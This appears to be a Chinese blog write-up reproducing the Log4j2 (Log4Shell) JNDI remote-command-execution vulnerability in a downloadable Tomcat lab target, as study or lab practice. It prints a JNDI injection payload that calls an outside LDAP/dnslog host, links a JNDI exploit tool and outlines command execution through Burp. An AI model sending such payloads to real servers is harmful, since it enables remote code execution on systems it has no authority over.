渗透测试|迟来的Log4j2命令执行简单复现
2023-06-13 09:12:12 时间
至少我们曾经在一起过。
来自:一言
var xhr = new XMLHttpRequest(); xhr.open('get', 'https://v1.hitokoto.cn/'); xhr.onreadystatechange = function () { if (xhr.readyState === 4) { var data = JSON.parse(xhr.responseText); var hitokoto = document.getElementById('hitokoto'); hitokoto.innerText = data.hitokoto; } } xhr.send();
前言
最近很火的漏洞,前几天第一时间复现了,今天发文章记录一下.[aru_13]
探测payload:
${jndi:ldap://dnslog.cn/exp}
靶场在下方下载。
环境搭建
1.首先安装tomcat,直接在web管理端部署靶场的war包即可.
2.部署后直接访问根目录即可看到靶场。
漏洞复现
1.直接输入框输入payload即可进行检测,检测的话用dnslog。
2.直接提交后,如果漏洞存在的话dnslog即可收到请求。
命令执行
1.下载jndi注入工具,目前git上大部分都已经删除,找到一个,希望安全自检:https://github.com/Mr-xn/JNDIExploit-1
启动环境
2.burp抓包进行命令执行回显的测试
命令执行成功
jndi注入工具这边也收到了请求
3.弹出计算器
靶场下载
相关文章
- 【说站】python API接口如何测试
- 国产CPU执行SPL实现数据库运算的性能实用性测试
- 基于云IDE的python开发测试-续
- 利用pytest hook函数实现自动化测试结果推送企业微信
- python自动化测试—Python自动化框架及工具
- 测试之路 pytest接口自动化-request包中的headers覆盖
- 基于Python接口自动化测试框架+数据与代码分离(进阶篇)附源码
- ES Client性能测试初探
- 【Rust日报】2022-12-31 Rust 如何测试?
- 如何在 Windows 系统上安装 WordPress 本地测试
- 权限进入Linux根目录的权限:Root的测试(linuxroot执行)
- 测试Oracle 创建表的效果(oracle创建表测试)
- 英特尔旗下Mobileye在纽约测试自动驾驶汽车
- 显示器也带SoC:苹果测试带仿生芯片和神经引擎的显示器
- Linux 性能测试:揭秘最佳性能工具(linux性能测试工具)
- 贝文件的性能测试Linux服务器拷贝文件的性能测试(linux服务器对拷)
- 均胜电子与 51WORLD 合作:将为自动驾驶汽车提供虚拟仿真测试服务
- Linux Xtest:测试新特性的链接到未来(linuxxtest)
- 使用CMD检验MySQL是否连接成功(cmd测试mysql是否连接)
- 性测试Redis在高并发下的表现(测试redis的并发)